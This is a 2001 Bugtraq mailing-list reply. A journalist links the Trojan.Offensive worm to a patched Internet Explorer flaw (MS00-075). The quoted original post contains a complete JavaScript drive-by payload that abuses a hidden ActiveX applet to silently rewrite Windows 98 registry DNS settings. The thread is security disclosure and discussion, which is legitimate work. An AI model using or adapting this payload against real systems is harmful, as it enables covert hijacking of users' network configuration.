[22456] in bugtraq
RE: javascript can write anything to windows98 registry
daemon@ATHENA.MIT.EDU (Rob Lemos)
Wed Aug 29 17:56:20 2001
Message-ID: <3482305AF0F6CF469ED45C0D48FAFCF70B5F3884@cnet10.cnet.cnwk>
From: Rob Lemos <rlemos@zdnet.com>
To: "'\"Marcin Jackowski\" <marcin@jackowski.net>@INTERNET@INTERLIANT@ZDNET'" <IMCEANOTES-+22Marcin+20Jackowski+22+20+3Cmarcin+40jackowski+2Enet+3E+40INTERNET+40INTERLIANT+40ZDNET@cnet.com>
Cc: "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Date: Wed, 29 Aug 2001 08:33:21 -0700
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
This is the basis for the Trojan.Offensive worm. The problem was originally discovered almost a year ago and was patched last November.
Here's the Microsoft link: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-075.asp
And my article: http://news.cnet.com/news/0-1003-200-6961705.html
-R
Robert Lemos
Senior writer -- Security, Privacy and e-Crime
ZDNet News/CNet News.com
PGP key: 0x6E1966EB
> -----Original Message-----
> From: "Marcin Jackowski" <marcin@jackowski.net>@INTERNET@INTERLIANT@ZDNET
> Sent: Tuesday, August 28, 2001 8:21 AM
> To: bugtraq@securityfocus.com@INTERNET@INTERLIANT@ZDNET
> Subject: javascript can write anything to windows98 registry
>
> > <<...OLE_Obj...>>
> here's code from
> www.4y4y.net:88/ls.html
> it can write any value to windows98 registry
> solution: disable JavaScript in InternetExplorer
> tested on IE5.5
> Marcin Jackowski
> ---------------------------------------------------------------
> <script>
> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
> function yuzi3(){
> try{
> a1=document.applets[0];
> a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
> a1.createInstance();Shl = a1.GetObject();
> a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
> try{
> Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-se
> rvers.net");
> }
> catch(e){}
> }
> catch(e){}
> }
> setTimeout("yuzi3()",1000);
> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
> function yuzi2(){
> try{
> a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
> a2.createInstance();Shl =
> a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
> try{
> Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
> }
> catch(e){}
> }
> catch(e){}
> }setTimeout("yuzi2()",1000);
> </script>
>
> > <<...OLE_Obj...>> << File: smime.p7s >>
